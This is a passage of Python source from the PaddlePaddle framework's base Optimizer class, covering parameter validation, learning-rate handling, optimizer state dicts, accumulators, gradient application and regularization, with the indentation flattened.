params_and_grads.append((param, param_bar[i]))
return params_and_grads
class Optimizer:
r"""Optimizer Base class.
Define the common interface of an optimizer.
User should not use this class directly,
but need to use one of it's implementation.
Args:
learning_rate (float|LRScheduler): The learning rate used to update ``Parameter``.
It can be a float value or any subclass of ``LRScheduler`` .
parameters (list|tuple, optional): List/Tuple of ``Tensor`` names to update to minimize ``loss``. \
This parameter is required in dygraph mode. And you can specify different options for \
different parameter groups such as the learning rate, weight decay, etc, \
            then the parameters are a list of dict. Note that the learning_rate in parameter groups \
represents the scale of base learning_rate. \
The default value is None in static graph mode, at this time all parameters will be updated.
weight_decay (float|WeightDecayRegularizer, optional): The strategy of regularization. \
            It can be a float value as the coeff of L2 regularization or \
:ref:`api_fluid_regularizer_L1Decay`, :ref:`api_fluid_regularizer_L2Decay`.
If a parameter has set regularizer using :ref:`api_fluid_ParamAttr` already, \
the regularization setting here in optimizer will be ignored for this parameter. \
Otherwise, the regularization setting here in optimizer will take effect. \
Default None, meaning there is no regularization.
        grad_clip (GradientClipBase, optional): Gradient clipping strategy, it's an instance of \
            some derived class of ``GradientClipBase`` . There are three clipping strategies \
( :ref:`api_fluid_clip_GradientClipByGlobalNorm` , :ref:`api_fluid_clip_GradientClipByNorm` , \
:ref:`api_fluid_clip_GradientClipByValue` ). Default None, meaning there is no gradient clipping.
name (str, optional): Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`.
The default value is None.
Returns:
Base class for optimizer.
Examples:
.. code-block:: python
#Take the subclass adam as an example
import paddle
linear = paddle.nn.Linear(10, 10)
inp = paddle.uniform(shape=[10, 10], min=-0.1, max=0.1)
out = linear(inp)
loss = paddle.mean(out)
adam = paddle.optimizer.Adam(learning_rate=0.1,
parameters=linear.parameters())
loss.backward()
adam.step()
adam.clear_grad()
#Take the subclass sgd as an example
#optimize parameters in linear_1 and linear2 in different options.
#Note that the learning_rate of linear_2 is 0.01.
linear_1 = paddle.nn.Linear(10, 10)
linear_2 = paddle.nn.Linear(10, 10)
inp = paddle.uniform(shape=[10, 10], min=-0.1, max=0.1)
out = linear_1(inp)
out = linear_2(out)
loss = paddle.mean(out)
sgd = paddle.optimizer.SGD(
learning_rate=0.1,
parameters=[{
'params': linear_1.parameters()
}, {
'params': linear_2.parameters(),
'weight_decay': 0.001,
'learning_rate': 0.1
}],
weight_decay=0.01)
loss.backward()
sgd.step()
sgd.clear_grad()
"""
@imperative_base.no_grad()
def __init__(
self,
learning_rate,
parameters=None,
weight_decay=None,
grad_clip=None,
name=None,
):
if parameters is not None:
# paddle.Tensor is also iterable, so here we don't check whether
# the input is iterable, if the input is paddle.Tensor, the
# list(paddle.Tensor) will be a error value
if isinstance(parameters, (paddle.Tensor, core.eager.Tensor)):
raise TypeError(
"`parameters` argument given to the optimizer should be "
"an iterable of paddle Tensors, but got argument type is `{}`.".format(
type(parameters)
)
)
if isinstance(parameters, dict):
raise TypeError(
"`parameters` argument should not get dict type, "
"if parameter groups is needed, please set `parameters`"
" as list of dict"
)
self._parameter_list = list(parameters)
else:
self._parameter_list = None
self._name = name
if framework.in_dygraph_mode():
if self._parameter_list is None:
raise AttributeError(
"parameters argument given to the Optimizer should not be None in dygraph mode."
)
if weight_decay is not None:
if not isinstance(self._parameter_list[0], dict):
for param in self._parameter_list:
if (
hasattr(param, 'regularizer')
and param.regularizer is not None
):
logging.info(
"If regularizer of a Parameter has been set by 'paddle.ParamAttr' or 'static.WeightNormParamAttr' already. "
"The weight_decay[%s] in Optimizer will not take effect, and it will only be applied to other Parameters!"
% weight_decay.__str__()
)
break
if not isinstance(learning_rate, (float, LRScheduler)):
raise TypeError(
"learning rate should be float or LRScheduler, got %s here"
% type(learning_rate)
)
if grad_clip is not None:
if not isinstance(grad_clip, paddle.nn.clip.GradientClipBase):
raise TypeError(
"'grad_clip' should be an instance of GradientClipBase's derived class"
)
if isinstance(weight_decay, float):
self.regularization = L2Decay(weight_decay)
else:
self.regularization = weight_decay
self._grad_clip = grad_clip
self._learning_rate = learning_rate
self._dtype = None
# Infer the dtype form parameter
if self._parameter_list:
if isinstance(self._parameter_list[0], dict):
for param_group in self._parameter_list:
assert (
'params' in param_group
), 'params should be set in parameters if parameter groups are optimized in different options'
self._dtype = self._parameter_list[0]['params'][0].dtype
else:
self._dtype = self._parameter_list[0].dtype
# each program should have a independent learning rate
# program -> tensor(learning_rate)
self._learning_rate_map = {}
# Dictionary of accumulators. Some optimizer subclasses need to
# allocate and manage extra tensors associated with the parameters
# to train. These tensors are called accumulators.
        # {accum_name : { parameter_name : accumulator_for_parameter, ...}, ...}
self._accumulators = defaultdict(lambda: {})
self.helper = None
self._opti_name_list = []
self._accumulators_holder = {}
self._param_device_map = {}
self.clear_gradients = self.clear_grad
self._default_dict = {
'weight_decay': self.regularization,
'grad_clip': self._grad_clip,
}
self._param_groups = []
if self._parameter_list and isinstance(self._parameter_list[0], dict):
for param_group in self._parameter_list:
self._add_param_group(param_group.copy())
else:
self._param_groups = self._parameter_list
# NOTE: Multi Tensor: Pass in all parameters and gradients to the op kernel of the Optimizer at one time for updating for dygraph mode.
# Optimizer support list: [ paddle.optimizer.Momentum, paddle.optimizer.Adam].
self._use_multi_tensor = None
self._param_dict = self._create_multi_tensor_dict()
self._auxiliary_vars = {}
self._already_create_accumulater = set()
# create master gradients' states
self._create_master_grad_states()
def _create_master_grad_states(self):
# master gradients states
self._master_grads = {}
self._master_grad = False
def _set_auxiliary_var(self, key, val):
self._auxiliary_vars[key] = val
def _create_multi_tensor_dict(self):
n = len(self._param_groups) if self._param_groups is not None else 1
return {
'FP32_LODTensor': [[] for _ in range(n)],
'FP16_LODTensor': [[] for _ in range(n)],
}
def _get_auxiliary_var(self, key):
return self._auxiliary_vars.get(key, None)
@framework.dygraph_only
def state_dict(self):
'''
        Get state dict information from optimizer. It contains all the tensors used by the optimizer. For the Adam optimizer, it contains beta1, beta2, momentum etc. If an LRScheduler has been used, global_step will be included in the state dict.
If the optimizer never be called(minimize function), the state_dict is empty.
Args:
None
Returns:
state_dict(dict) : dict contains all the Tensor used by optimizer
Examples:
.. code-block:: python
import paddle
emb = paddle.nn.Embedding(10, 10)
adam = paddle.optimizer.Adam(0.001, parameters=emb.parameters())
state_dict = adam.state_dict()
'''
state_dict = {}
for k, v in self._accumulators.items():
for para_name, var_tmp in v.items():
state_dict[var_tmp.name] = var_tmp
# if has master weight and then save master weight
if hasattr(self, "_master_weights"):
if len(self._master_weights) != 0:
state_dict["master_weights"] = self._master_weights
# global step if use lr decay
if isinstance(self._learning_rate, LRScheduler):
state_dict["LR_Scheduler"] = self._learning_rate.state_dict()
return state_dict
@framework.dygraph_only
def set_state_dict(self, state_dict):
'''
        Load optimizer state dict. For the Adam optimizer, it contains beta1, beta2, momentum etc. If an LRScheduler has been used, global_step will be changed.
Args:
            state_dict(dict) : Dict containing all the Tensors needed by the optimizer
Return:
None
Examples:
.. code-block:: python
import paddle
emb = paddle.nn.Embedding(10, 10)
layer_state_dict = emb.state_dict()
paddle.save(layer_state_dict, "emb.pdparams")
scheduler = paddle.optimizer.lr.NoamDecay(
d_model=0.01, warmup_steps=100, verbose=True)
adam = paddle.optimizer.Adam(
learning_rate=scheduler,
parameters=emb.parameters())
opt_state_dict = adam.state_dict()
paddle.save(opt_state_dict, "adam.pdopt")
opti_state_dict = paddle.load("adam.pdopt")
adam.set_state_dict(opti_state_dict)
'''
if isinstance(self._learning_rate, LRScheduler):
self._learning_rate.set_state_dict(state_dict["LR_Scheduler"])
# NOTE: exclude learning rate scheduler's state from
# _accumulators_holder.
state_dict = state_dict.copy()
if "LR_Scheduler" in state_dict:
state_dict.pop("LR_Scheduler")
if "master_weights" in state_dict:
if hasattr(self, "_master_weights"):
self._master_weights = state_dict["master_weights"]
state_dict.pop("master_weights")
self._accumulators_holder = state_dict
for k, v in self._accumulators.items():
for para_name, var_tmp in v.items():
assert (
var_tmp.name in state_dict
), f"optimizer Tensor {var_tmp.name} not found"
var = var_tmp.value()
tensor = var.get_tensor()
model_np = np.array(tensor)
load_para = state_dict[var_tmp.name]
if isinstance(load_para, Variable):
load_para_np = np.array(load_para)
elif isinstance(load_para, core.eager.Tensor):
load_para_np = np.array(load_para)
elif isinstance(load_para, np.ndarray):
load_para_np = load_para
else:
                    raise RuntimeError(
                        "State dict type {} not supported".format(
str(type(load_para))
)
)
assert (
model_np.shape == load_para_np.shape
), "Parameter shape not match, Dygraph Parameter [ {} ] need tensor with shape {} but load tensor with shape {}".format(
model_np.name, model_np.shape, load_para_np.shape
)
assert (
model_np.dtype == load_para_np.dtype
), "Parameter dtype not match, Dygraph Parameter [ {} ] need tensor with dtype {} but load tensor with dtype {}".format(
model_np.name, model_np.dtype, load_para_np.dtype
)
tensor.set(load_para_np, framework._current_expected_place())
def get_opti_var_name_list(self):
return self._opti_name_list
def _create_global_learning_rate(self):
def do_create():
# lr var can't be float16 or bfloat16, for pure fp16 or bf16 training, should extra handle the dtype for lr
_lr_dtype = (
paddle.get_default_dtype()
if self._dtype is None
else self._dtype
)
_lr_dtype = (
paddle.float32
if (
(
paddle.get_default_dtype() != "float16"
and _lr_dtype == paddle.float16
)
or (
paddle.get_default_dtype() != "bfloat16"
and _lr_dtype == paddle.bfloat16
)
)
else _lr_dtype
)
if isinstance(self._learning_rate, LRScheduler):
lr_var = self._global_learning_rate()
# only create global lr_var once
if not isinstance(lr_var, framework.Variable):
lr_name = unique_name.generate('learning_rate')
self._learning_rate._var_name = lr_name
lr_var = self.helper.create_global_variable(
name=lr_name,
shape=[],
persistable=True,
stop_gradient=True,
dtype=_lr_dtype,
)
main_prog = framework.default_main_program()
main_prog.lr_scheduler = self._learning_rate
main_prog.lr_var = lr_var
self._learning_rate_map[
framework.default_main_program()
] = lr_var
lr_value = float(self._learning_rate())
self.helper.set_variable_initializer(
lr_var,
initializer=paddle.nn.initializer.Constant(value=lr_value),
)
elif isinstance(self._learning_rate, float):
# only create global lr_var once
lr = self._global_learning_rate()
if isinstance(lr, framework.Variable):
return
else:
self._learning_rate_map[
framework.default_main_program()
] = paddle.static.create_global_var(
name=unique_name.generate("learning_rate"),
shape=[],
value=float(self._learning_rate),
dtype=_lr_dtype,
persistable=True,
)
with paddle.fluid.framework.dygraph_guard_if_declarative():
do_create()
@framework.dygraph_only
def set_lr(self, value):
"""
:api_attr: imperative
        Set the value of the learning rate manually in the optimizer. If the optimizer uses an LRScheduler,
        this API cannot be invoked, because it would lead to a conflict.
Args:
value (float): the value of learning rate
Returns:
None
Examples:
.. code-block:: python
import paddle
linear = paddle.nn.Linear(10, 10)
adam = paddle.optimizer.Adam(0.1, parameters=linear.parameters())
# set learning rate manually by python float value
lr_list = [0.2, 0.3, 0.4, 0.5, 0.6]
for i in range(5):
adam.set_lr(lr_list[i])
lr = adam.get_lr()
print("current lr is {}".format(lr))
# Print:
# current lr is 0.2
# current lr is 0.3
# current lr is 0.4
# current lr is 0.5
# current lr is 0.6
"""
if not isinstance(value, (int, float)):
raise TypeError(
"The type of 'value' in optimizer.set_lr must be float, but received %s."
% (type(value))
)
if isinstance(self._learning_rate, LRScheduler):
raise RuntimeError(
"optimizer's learning rate can't be LRScheduler when invoke this API, because this will lead to conflict."
)
self._learning_rate = float(value)
current_lr = self._global_learning_rate()
if current_lr is not None:
if in_dygraph_mode():
place = _current_expected_place()
_C_ops.full_(
current_lr,
list(current_lr.shape),
float(value),
current_lr.dtype,
place,
)
else:
global_block = framework.default_main_program().global_block()
global_block.append_op(
type='fill_constant',
outputs={'Out': [current_lr]},
attrs={
'dtype': current_lr.dtype,
'shape': list(current_lr.shape),
'value': float(value),
},
stop_gradient=True,
)
def get_lr(self):
"""
Get current learning rate of optimizer.
        If 'LRScheduler' is not used, the returned value is always the same.
        If 'LRScheduler' is used, the returned value is the current scheduled learning rate.
Returns:
float: The current learning rate of optimizer.
Examples:
.. code-block:: python
# train on default dynamic graph mode
import paddle
import numpy as np
emb = paddle.nn.Embedding(10, 3)
                ## example1: LRScheduler is not used, the returned value is always the same
adam = paddle.optimizer.Adam(0.01, parameters = emb.parameters())
for batch in range(10):
input = paddle.randint(low=0, high=5, shape=[5])
out = emb(input)
out.backward()
print("Learning rate of step{}: {}".format(batch, adam.get_lr())) # 0.01
adam.step()
## example2: StepDecay is used, return the scheduled learning rate
scheduler = paddle.optimizer.lr.StepDecay(learning_rate=0.5, step_size=2, gamma=0.1)
adam = paddle.optimizer.Adam(scheduler, parameters = emb.parameters())
for batch in range(10):
input = paddle.randint(low=0, high=5, shape=[5])
out = emb(input)
out.backward()
print("Learning rate of step{}: {}".format(batch, adam.get_lr())) # 0.5->0.05...
adam.step()
scheduler.step()
# train on static graph mode
paddle.enable_static()
main_prog = paddle.static.Program()
start_prog = paddle.static.Program()
with paddle.static.program_guard(main_prog, start_prog):
x = paddle.static.data(name='x', shape=[None, 10])
z = paddle.static.nn.fc(x, 100)
loss = paddle.mean(z)
scheduler = paddle.optimizer.lr.StepDecay(learning_rate=0.5, step_size=2, gamma=0.1)
adam = paddle.optimizer.Adam(learning_rate=scheduler)
adam.minimize(loss)
exe = paddle.static.Executor()
exe.run(start_prog)
for batch in range(10):
                    print("Learning rate of step{}: {}".format(batch, adam.get_lr())) # 0.5->0.05->0.005...
out = exe.run(main_prog, feed={'x': np.random.randn(3, 10).astype('float32')})
scheduler.step()
"""
if isinstance(self._learning_rate, float):
return self._learning_rate
else:
return self._learning_rate()
def _global_learning_rate(self, program=None):
"""
get global decayed learning rate
:return:
"""
if program is None:
program = framework.default_main_program()
return self._learning_rate_map.get(program, None)
def _append_optimize_op(self, block, param_and_grad):
"""append optimize operator to block and return all the added optimize_op"""
        raise NotImplementedError(
            "Class \"Optimizer\" cannot be used directly as an optimizer, please use its subclasses such as \"Adam\""
)
def _create_param_lr(self, param_and_grad):
# create learning rate tensor for every parameter
param = param_and_grad[0]
if hasattr(param, 'optimize_attr'):
param_lr = param.optimize_attr['learning_rate']
if type(param_lr) == Variable:
return param_lr
else:
if param_lr == 1.0:
return self._global_learning_rate()
else:
with default_main_program()._lr_schedule_guard(
is_with_opt=True
), framework.name_scope('scale_with_param_lr'):
return self._global_learning_rate() * param_lr
else:
return self._global_learning_rate()
def _create_master_weight(self, param):
if param.name in self._master_weights:
var = self._master_weights[param.name]
else:
assert isinstance(self.helper, LayerHelper)
var_name = param.name + "_fp32_master"
var_name = unique_name.generate(var_name)
var = paddle.static.create_global_var(
name=var_name,
shape=param.shape,
value=0,
dtype='float32',
persistable=True,
)
block = self.helper.startup_program.global_block()
block.append_op(
type="cast",
inputs={"X": [param]},
outputs={"Out": [var]},
attrs={
"in_dtype": param.dtype,
"out_dtype": core.VarDesc.VarType.FP32,
},
)
self._master_weights[param.name] = var
return var
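    # Hedged sketch of when master weights are used (illustrative: `multi_precision`
    # is the flag exposed by subclasses such as Adam/Momentum, not by this base
    # class, and the fp16 parameters are assumed to come from an AMP setup):
    #
    #   opt = paddle.optimizer.Adam(learning_rate=1e-3,
    #                               parameters=model.parameters(),  # fp16 params
    #                               multi_precision=True)
    #   # For each fp16/bf16 parameter, _create_master_weight then keeps an fp32
    #   # copy named "<param_name>_fp32_master" that receives the actual update.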
def _create_master_grad(self, grad):
assert self._is_dtype_fp16_or_bf16(grad.dtype)
if grad.name in self._master_grads:
var = self._master_grads[grad.name]
else:
var_name = grad.name + "_fp32_master"
var_name = unique_name.generate(var_name)
var = grad.block.create_var(
name=var_name,
shape=grad.shape,
value=0,
dtype='float32',
lod_level=grad.lod_level,
persistable=grad.persistable,
is_data=grad.is_data,
)
self._master_grads[grad.name] = var
return var
def _create_accumulators(self, block, parameters):
"""Create all accumulators needed by the parameters
Args:
block: the block in which the loss tensor is present
parameters: list of parameter tensors for the optimizer
"""
pass
def _finish_update(self, block, parameters_and_grads):
"""Finish any custom updates needed
before completing an optimization step
Args:
block: the block in which the loss tensor is present
parameters: list of parameter tensors for the optimizer
Returns:
None
"""
pass
def _add_accumulator(
self,
name,
param,
dtype=None,
fill_value=0.0,
shape=None,
type=None,
device=None,
):
"""Utility function to add an accumulator for a parameter
Args:
block: the block in which the loss tensor is present
name: name of the accumulator
param: parameter tensor for which accumulator is to be added
dtype: data type of the accumulator tensor
fill_value: value to initialize the accumulator tensor
"""
if self._name is not None:
name = self._name + "_" + name
if (
name in self._accumulators
and param.name in self._accumulators[name]
):
if framework.in_dygraph_mode():
return self._accumulators[name][param.name]
raise Exception(
"Accumulator {} already exists for parameter {}".format(
name, param.name
)
)
if shape is None:
shape = param.shape
assert isinstance(self.helper, LayerHelper)
var_name = param.name + "_" + name
var_name = unique_name.generate(var_name)
self._opti_name_list.append(var_name)
var = self.helper.create_global_variable(
name=var_name,
persistable=True,
dtype=dtype or param.dtype,
type=core.VarDesc.VarType.LOD_TENSOR,
shape=shape,
belong_to_optimizer=True,
)
if device is None:
device = self._get_device_for_param(param.name)
if (
in_dygraph_mode()
and (device == 'cpu' or isinstance(device, core.CPUPlace))
and (not core.is_compiled_with_xpu())
):
_C_ops.full_(
var,
var.shape,
str(float(fill_value)),
var.dtype,
core.CPUPlace(),
)
else:
with device_guard(device):
self.helper.set_variable_initializer(
var,
initializer=paddle.nn.initializer.Constant(
value=float(fill_value)
),
)
if framework.in_dygraph_mode():
if len(self._accumulators_holder) > 0:
assert (
var_name in self._accumulators_holder
), "Optimizer set error, {} should in state dict".format(
var_name
)
var.set_value(self._accumulators_holder.pop(var_name))
self._accumulators[name][param.name] = var
return var
def _get_accumulator(self, name, param):
"""Utility function to fetch an accumulator for a parameter
Args:
name: name of the accumulator
param: parameter tensor for which accumulator is to be fetched
Returns:
accumulator tensor for the parameter
"""
if self._name is not None:
name = self._name + "_" + name
if (
name not in self._accumulators
or param.name not in self._accumulators[name]
):
raise Exception(
"Accumulator {} does not exist for parameter {}".format(
name, param.name
)
)
return self._accumulators[name][param.name]
def _get_accumulator_master(self, name, param):
"""Utility function to fetch an accumulator for a parameter
Args:
name: name of the accumulator
param: parameter variable for which accumulator is to be fetched
Returns:
accumulator variable for the parameter
"""
if self._name is not None:
name = self._name + "_" + name
find_master = self._multi_precision and self._is_dtype_fp16_or_bf16(
param.dtype
)
target_param = (
self._master_weights[param.name] if find_master else param
)
target_name = target_param.name
if (
name not in self._accumulators
or target_name not in self._accumulators[name]
):
raise Exception(
"Accumulator {} does not exist for parameter {}".format(
name, target_name
)
)
return self._accumulators[name][target_name]
def _update_param_device_map(self, parameters_and_grads, target_block):
for param_and_grad in parameters_and_grads:
if param_and_grad[0].stop_gradient is False:
param_name = param_and_grad[0].name
ops = target_block.ops
device_attr_name = (
core.op_proto_and_checker_maker.kOpDeviceAttrName()
)
for op in ops:
input_arg_names = op.input_arg_names
if param_name in input_arg_names:
self._param_device_map[param_name] = op.attr(
device_attr_name
)
break
def _get_device_for_param(self, param_name):
device = None
if param_name in self._param_device_map:
device = self._param_device_map[param_name]
return device
def _create_optimization_pass(
self, parameters_and_grads, param_group_idx=0
):
"""Add optimization operators to update gradients to tensors.
Args:
parameters_and_grads(list(tuple(Tensor, Tensor))):
a list of (tensor, gradient) pair to update.
Returns:
return_op_list: a list of operators that will complete one step of
optimization. This will include parameter update ops, global step
update ops and any other custom ops required by subclasses to manage
their internal state.
"""
# This is a default implementation of create_optimization_pass that
# can be shared by most optimizers. This implementation assumes that
# the subclass will implement the _append_optimize_op method and the
# _initialize_tensors method. The subclass can extend the
# _create_accumulators method if it needs to create accumulators
# for parameters and extend _finish_update method to add custom ops.
        # Always called under program_guard; use the global block as the loss block
# But if current block is in control flow, append optimize op in the
# grad block of current block
global_block = framework.default_main_program().global_block()
target_block = global_block
current_block = framework.default_main_program().current_block()
if current_block.idx != global_block.idx:
assert (
current_block.backward_block_idx != -1
), "current block is not global_block, but it doesn't have backward block."
target_block = framework.default_main_program().blocks[
current_block.backward_block_idx
]
start = len(target_block.ops)
self.helper = LayerHelper(self.__class__.__name__)
self._create_global_learning_rate()
# NOTE: Multi Tensor support [ Momentum, Adam ] for dygraph mode
if self._use_multi_tensor and self.__class__.__name__ in [
'Momentum',
'Adam',
]:
if (
len(self._param_dict['FP32_LODTensor'][param_group_idx]) == 0
and len(self._param_dict['FP16_LODTensor'][param_group_idx])
== 0
):
if isinstance(parameters_and_grads, list):
assert param_group_idx == 0
self._multi_tensor_init(
target_block,
[
p[0]
for p in parameters_and_grads
if not p[0].stop_gradient
],
param_group_idx,
)
else:
self._update_param_group(parameters_and_grads)
self._multi_tensor_init(
target_block,
[
p[0]
for p in parameters_and_grads['params']
if not p[0].stop_gradient
],
param_group_idx,
)
if framework.in_dygraph_mode():
self._append_optimize_multi_tensor_op(
target_block,
parameters_and_grads,
param_group_idx=param_group_idx,
)
else:
self._update_param_device_map(
parameters_and_grads, target_block
)
# NOTE: Multi Tensor requires all parameters to be in the same device and program.
# param_grad_list = [p_0,g_0,p_1,g_1,....]
param_grad_list = []
for param_and_grad in parameters_and_grads:
if (
not param_and_grad[0].stop_gradient
and param_and_grad[1] is not None
):
param_grad_list.append(param_and_grad[0])
param_grad_list.append(param_and_grad[1])
with param_grad_list[0].block.program._optimized_guard(
param_grad_list
), name_scope("optimizer"):
device = self._get_device_for_param(param_grad_list[0].name)
with device_guard(device):
self._append_optimize_multi_tensor_op(
target_block,
parameters_and_grads,
param_group_idx=param_group_idx,
)
else:
if not framework.in_dygraph_mode():
params_grads_device_map = (
parameters_and_grads['params']
if isinstance(parameters_and_grads, dict)
else parameters_and_grads
)
self._update_param_device_map(
params_grads_device_map, target_block
)
if isinstance(parameters_and_grads, list):
with paddle.fluid.framework.dygraph_guard_if_declarative():
self._create_accumulators(
target_block,
[
p[0]
for p in parameters_and_grads
if not p[0].stop_gradient
],
)
else:
params_acc_dict = parameters_and_grads.copy()
params_acc_dict['params'] = [
p[0]
for p in params_acc_dict['params']
if not p[0].stop_gradient
]
with paddle.fluid.framework.dygraph_guard_if_declarative():
self._create_accumulators(target_block, params_acc_dict)
if framework.in_dygraph_mode():
found_inf = self._get_auxiliary_var('found_inf')
if found_inf:
if isinstance(found_inf, core.eager.Tensor):
self._set_auxiliary_var('found_inf', True)
else:
if isinstance(found_inf, core.eager.Tensor):
self._set_auxiliary_var('found_inf', False)
if isinstance(parameters_and_grads, list):
for param_and_grad in parameters_and_grads:
if param_and_grad[1] is None:
continue
if param_and_grad[0].stop_gradient is False:
self._append_optimize_op(
target_block, param_and_grad
)
else:
for param_and_grad in parameters_and_grads['params']:
if param_and_grad[1] is None:
continue
if param_and_grad[0].stop_gradient is False:
param_grad_dict = {}
param_grad_dict['params'] = param_and_grad
param_grad_dict.update(
{
k: v
for k, v in parameters_and_grads.items()
if k != 'params'
}
)
self._append_optimize_op(
target_block, param_grad_dict
)
else:
for param_and_grad in parameters_and_grads:
if param_and_grad[1] is None:
continue
with param_and_grad[0].block.program._optimized_guard(
param_and_grad
), name_scope("optimizer"):
if param_and_grad[0].stop_gradient is False:
device = self._get_device_for_param(
param_and_grad[0].name
)
with device_guard(device):
optimize_op = self._append_optimize_op(
target_block, param_and_grad
)
# Get custom finish ops for subclasses
# FIXME: Need to fix this once we figure out how to handle dependencies
self._finish_update(target_block, parameters_and_grads)
end = len(target_block.ops)
return target_block._slice_ops(start, end)
def _append_dgc_ops(self, param_and_grad):
pass
def backward(
self,
loss,
startup_program=None,
parameters=None,
no_grad_set=None,
callbacks=None,
):
"""
The first part of ``minimize``, do auto-diff to append backward operations for
the current program.
Args:
loss (Tensor): ``loss`` tensor to run optimizations.
startup_program (Program, optional): :ref:`api_fluid_Program` for
initializing parameters in ``parameters``. The default value
is None, at this time :ref:`api_fluid_default_startup_program` will be used.
parameters (list, optional): List of ``Tensor`` or ``Tensor.name`` to update
to minimize ``loss``. The default value is None, at this time all parameters
will be updated.
no_grad_set (set, optional): Set of ``Tensor`` or ``Tensor.name`` that don't need
to be updated. The default value is None.
callbacks (list, optional): list of callable objects to run when appending backward
operator for one parameter. The default value is None.
Return:
list: list of (param, grad) tensor pairs, param is ``Parameter``,
grad is the gradient value corresponding to the parameter.
Examples:
.. code-block:: python
import paddle
x = paddle.arange(26, dtype="float32").reshape([2, 13])
linear = paddle.nn.Linear(13, 5)
# This can be any optimizer supported by dygraph.
adam = paddle.optimizer.Adam(learning_rate = 0.01,
parameters = linear.parameters())
out = linear(x)
out.backward()
adam.step()
adam.clear_grad()
"""
act_no_grad_set = None
if framework.in_dygraph_mode():
pass
else:
act_no_grad_set = self._get_no_grad_set(loss, no_grad_set)
# Infer dtype by loss if None
if self._dtype is None:
self._dtype = loss.dtype
if framework.in_dygraph_mode():
parameter_list = parameters if parameters else self._parameter_list
# It is very time-consuming to call c++ functions in a loop on the python side.
# We put this part of the code on the c++ side to improve the speed in eager mode.
params_grads = []
grads = core.eager.get_all_grads(parameter_list)
for index, grad in enumerate(grads):
if grad is not None:
params_grads.append((parameter_list[index], grad))
else:
if callbacks is None:
callbacks = [paddle.nn.clip.error_clip_callback]
else:
assert isinstance(callbacks, list)
program = loss.block.program
assert np.prod(loss.shape) == 1, (
"The number of elements of loss should be 1, but the current loss.shape is {}, whose number of elements is not 1. "
"Maybe that you should call paddle.mean to process the current loss.".format(
loss.shape
)
)
parameter_list = parameters if parameters else self._parameter_list
with program_guard(program, startup_program):
from paddle.incubate.autograd.utils import prim_enabled
if prim_enabled():
params_grads = append_backward_new(
[loss], parameter_list, act_no_grad_set, callbacks
)
else:
params_grads = append_backward(
loss, parameter_list, act_no_grad_set, callbacks
)
# Note: since we can't use all_reduce_op now,
# dgc_op should be the last op of one grad.
self._append_dgc_ops(params_grads)
return params_grads
def apply_gradients(self, params_grads):
"""
Second part of `minimize`, appending optimization operators for
given `params_grads` pairs.
Args:
params_grads (list): list of (param, grad) pair to do optimization.
Returns:
list: A list of operators appended to the current program.
Examples:
.. code-block:: python
import paddle
inp = paddle.uniform([10, 10], dtype="float32", min=-0.1, max=0.1)
linear = paddle.nn.Linear(10, 10)
out = linear(inp)
loss = paddle.mean(out)
optimizer = paddle.optimizer.Adam(learning_rate=0.1,
parameters=linear.parameters())
params_grads = optimizer.backward(loss)
optimizer.apply_gradients(params_grads)
"""
params_grads = sorted(params_grads, key=lambda x: x[0].name)
# 'optimizer(grad_clip)' or 'set_gradient_clip'
if self._grad_clip is not None:
params_grads = self._grad_clip(params_grads)
else:
params_grads = paddle.nn.clip.append_gradient_clip_ops(params_grads)
# Add regularization if any
params_grads = self.append_regularization_ops(
params_grads, self.regularization
)
optimize_ops = self._create_optimization_pass(params_grads)
return optimize_ops
def _apply_optimize(
self, loss, startup_program, params_grads, param_group_idx=0
):
"""
Second part of `minimize`, appending optimization operators for
given `params_grads` pairs.
Args:
loss (Tensor): loss tensor to run optimizations.
startup_program (Program): startup_program for initializing parameters
in `parameters`.
params_grads (list): list of (param, grad) pair to do optimization.
Returns:
list: A list of operators appended to the current program.
"""
if framework.in_dygraph_mode():
with program_guard(
framework.default_main_program(),
framework.default_startup_program(),
):
if isinstance(params_grads, list):
if self._grad_clip is not None:
params_grads = self._grad_clip(params_grads)
params_grads = self.append_regularization_ops(
params_grads, self.regularization
)
else:
grad_clip = params_grads['grad_clip']
if grad_clip is not None:
params_grads['params'] = grad_clip(
params_grads['params']
)
params_grads['params'] = self.append_regularization_ops(
params_grads['params'], self.regularization
)
optimize_ops = self._create_optimization_pass(
params_grads, param_group_idx=param_group_idx
)
else:
assert param_group_idx == 0
program = loss.block.program
with program_guard(program, startup_program):
optimize_ops = self.apply_gradients(params_grads)
return optimize_ops
def _create_regularization_of_grad(self, param, grad, regularization=None):
"""Create and add backward regularization Operators
Function helper of append_regularization_ops.
"""
# If no gradient or no regularization is specified, then we don't need to do anything
if grad is None or (
(
not hasattr(param, 'regularizer')
or (hasattr(param, 'regularizer') and param.regularizer is None)
)
and regularization is None
):
return grad
regularization_term = None
# when master_grad is true in amp training, grad will be fp32, but param maybe fp16.
# we get master weight when master_grad is true to avoid type mismatch error.
def get_target_param(param, grad):
target_param = param
if param.dtype != grad.dtype:
find_master = (
self._multi_precision
and self._is_dtype_fp16_or_bf16(param.dtype)
)
if find_master and len(self._master_weights) != 0:
target_param = self._master_weights[param.name]
else:
target_param = param.astype(grad.dtype)
return target_param
param = get_target_param(param, grad)
if hasattr(param, 'regularizer') and param.regularizer is not None:
# Add variable for regularization term in grad block
regularization_term = param.regularizer(param, grad, grad.block)
elif regularization is not None:
regularization_term = regularization(param, grad, grad.block)
assert regularization_term is not None
if framework.in_dygraph_mode():
return _C_ops.add_n([grad, regularization_term])
else:
new_grad = grad
if grad.type == core.VarDesc.VarType.SELECTED_ROWS:
# FIXME(zcd): If the grad is SELECTED_ROWS, after regularization,
# the grad's type and name will be changed. But the gradient's name
# is used in ParallelExecutor Reduce mode, so I add a flag for
# the new_grad here.
new_grad = grad.block.create_var(
name=grad.name + core.kNewGradSuffix(),
dtype=param.dtype,
shape=param.shape,
lod_level=param.lod_level,
type=core.VarDesc.VarType.LOD_TENSOR,
)
inputs = {"X": [grad, regularization_term]}
outputs = {"Out": [new_grad]}
grad.block.append_op(type='sum', inputs=inputs, outputs=outputs)
return new_grad
def append_regularization_ops(
self, parameters_and_grads, regularization=None
):
r"""Create and add backward regularization Operators
Creates and adds backward regularization operators in the BlockDesc.
This will add gradients of the regularizer function to the gradients
of the parameters and return these modified gradients. This is the
same as implementing weight decay in optimizers for regularization.
Args:
parameters_and_grads: A list of (parameters, gradients) pairs
that need to be regularized.
            regularization: A global regularizer. It is only applied to
                parameters whose own regularizer is not set.
Returns:
list[(Variable, Variable)]: list of (parameters, gradients) \
pair with the regularized gradient
Raises:
Exception: Unknown regularization type
"""
params_and_grads = []
if framework.in_dygraph_mode():
for param, grad in parameters_and_grads:
